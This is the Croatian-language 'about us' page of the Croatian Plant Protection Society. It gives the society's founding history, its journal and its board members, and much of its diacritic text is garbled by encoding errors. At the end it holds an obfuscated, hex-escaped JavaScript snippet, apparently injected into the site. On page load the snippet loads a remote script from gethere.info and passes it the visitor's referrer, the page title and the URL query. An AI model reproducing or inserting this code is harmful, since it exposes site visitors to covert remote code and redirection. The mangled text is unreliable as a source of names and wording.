o nama

P orast vaA?nosti razliA?itih biljnih A?tetoA?ina (A?tetnika, uzroA?nika bolesti i korova) uvjetovao je nagli razvoj one grane poljoprivrede i A?umarstva koja se bavi spreA?avanjem gubitaka koje ti A?tetoA?inje nanose. Ti gubici u Hrvatskoj iznose oko 500 milijuna dolara godiA?nje. Biljna zaA?tita, danas nazvana i fitomedicinom, postala je velikim problemom, pa i ograniA?avajuA�im faktorom proizvodnje i, zbog teA?koA�a pri izboru velikog broja moguA�ih mjera biljne zaA?tite, velikog broja od oko 600 dozvoljenih sredstava za biljnu zaA?titu u prometu, te nuA?nosti njihove struA?ne primjene. Kako su skoro sva sredstva svrstana u otrove to je njihova primjena povezana s razliA?itim opasnostima za organizme i okoliA?.

S truA?na, a time i uspjeA?na i bezopasna biljna zaA?tita, traA?i mnogo znanja, danas viA?e nego juA?er, sutra viA?e nego danas. To znanje djelomiA?no stjeA?u agronomi za vrijeme obrazovanja, a zaposleni u poljo-apotekama i seljaci svakodnevnom praksom. No to nije dovoljno i zbog stalnog napredovanja biljne zaA?tite i brojnih novosti. StruA?njacima zaA?tite bilja suoA?enim s brojnim poteA?koA�ama u ostvarivanju interesa struke nametnula se potreba za boljom meA�usobnom povezanoA?A�u i organiziranju, toA?nije, potreba da slijede primjere drugih grana poljoprivredne struke u RH i struA?njaka za zaA?titu bilja u svijetu organiziranih u strukovna druA?tva ili sliA?ne organizacije.

U cilju pokretanja osnivanja druA?tva za zaA?titu bilja u RH osnovan je u listopadu 2000. Inicijativni odbor u sastavu: prof.dr.sc. Bogdan CvjetkoviA�, Davor A?oviA� dipl.ing., prof.dr.sc. Jasminka Igrc BarA?iA�, A?eljko LonA?ar dipl.ing., akademik Milan Maceljski, Petar MesiA� dipl.ing., prof.dr.sc.Zvonimir OstojiA�. Inicijativni odbor sazvao je OsnivaA?ku skupA?tinu 27. listopada 2000., a veA� sam brojni odaziv sudionika te skupA?tine potvrdio je A?elja i potrebu o osnivanju takvog druA?tva. Izabran je Upravni odbor HDBZ s mandatom od 4 godine u sastavu: Lada BiA?ak dipl.ing, Bogdan CvjetkoviA� – predsjednik, mr.sc. Ivanka A?izmiA�, Davor A?oviA� dipl.ing., dr.sc. Miroslav Harapin, prof.dr.sc. Jasminka Igrc BarA?iA�, prof.dr.sc. DraA?enka JurkoviA�, akademik Milan Maceljski, Petar MesiA� dipl.ing. – rizniA?ar, prof.dr.sc. Zvonimir OstojiA� – dopredsjednik, doc.dr.sc. SnjeA?ana Topolovec-PintariA� – tajnica, dr.sc. Katja A?aniA�. HDBZ je RjeA?enjem Ministarstva pravosuA�a, uprave i lokalne samouprave upisano u Registar udruga RH 31. studenog 2000. pod brojem udruge 00001856. Na 2. SkupA?tini odrA?anoj 14. veljaA?e 2002. u sklopu 46. seminara biljne zaA?tite u Opatiji aklamacijom je poA?asnim predsjednikA�HDBZ proglaA?en akademik Milan Maceljski.

StruA?no znanje u oblasti biljne zaA?tite treba stalno dopunjavati praA�enjem struA?nog tiska. U Hrvatskoj je jedino struA?no glasilo utemeljeno joA? 1957. g. bila “BILJNA ZAA�TITA”, koju je u razdoblju od 1978. do 2000. g. nadomjestio “GLASNIK ZAA�TITE BILJA”, a od 2001. g. nastavlja izlaziti pod novim nazivom “GLASILO BILJNE ZAA�TITE”. HDBZ je od strane Ureda za odnose s javnoA?A�u Vlade RH potvrA�eno za nakladnika Glasila biljne zaA?tite.

Upravni odbor

 • dr.sc. Tatjana Masten Milek
  dr.sc. Tatjana Masten Milek Dopredsjednica
 • prof.dr.sc. Jasminka Igrc Barčić
  prof.dr.sc. Jasminka Igrc Barčić Predsjednica
 • Helena Virić Gašparić, mag.ing.agr.
  Helena Virić Gašparić, mag.ing.agr. Tajnica
 • prof.dr.sc. Renata Bažok
  prof.dr.sc. Renata Bažok
 • prof.dr.sc. Milan Glavaš
  prof.dr.sc. Milan Glavaš
 • prof.dr.sc. Božena Barić
  prof.dr.sc. Božena Barić
 • prof.dr.sc. Klara Barić
  prof.dr.sc. Klara Barić
 • prof.dr.sc. Jasenka Ćosić
  prof.dr.sc. Jasenka Ćosić
 • dr.sc. Elda Vitanović
  dr.sc. Elda Vitanović
 • dr.sc. Tomislav Kos
  dr.sc. Tomislav Kos
 • Matko Mesić, dipl. ing.
  Matko Mesić, dipl. ing.
 • Davor Čović, dipl.ing.
  Davor Čović, dipl.ing.
 • Jadranka Berić, dipl.ing.
  Jadranka Berić, dipl.ing.

Postani A?lan!

Prijavi se

Nadzorni odbor

 • dipl.ing. Petar Mesić
  dipl.ing. Petar Mesić
 • dr.sc. Adrijana Novak
  dr.sc. Adrijana Novak Predsjednica
 • Željko Lončar, dipl.ing.
  Željko Lončar, dipl.ing.

Sud A?asti

 • prof.dr.sc. Bogdan Cvjetković
  prof.dr.sc. Bogdan Cvjetković
 • prof.dr.sc. Marija Ivezić
  prof.dr.sc. Marija Ivezić Predsjednica
 • prof.dr.sc. Zvonimir Ostojić
  prof.dr.sc. Zvonimir Ostojić
var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}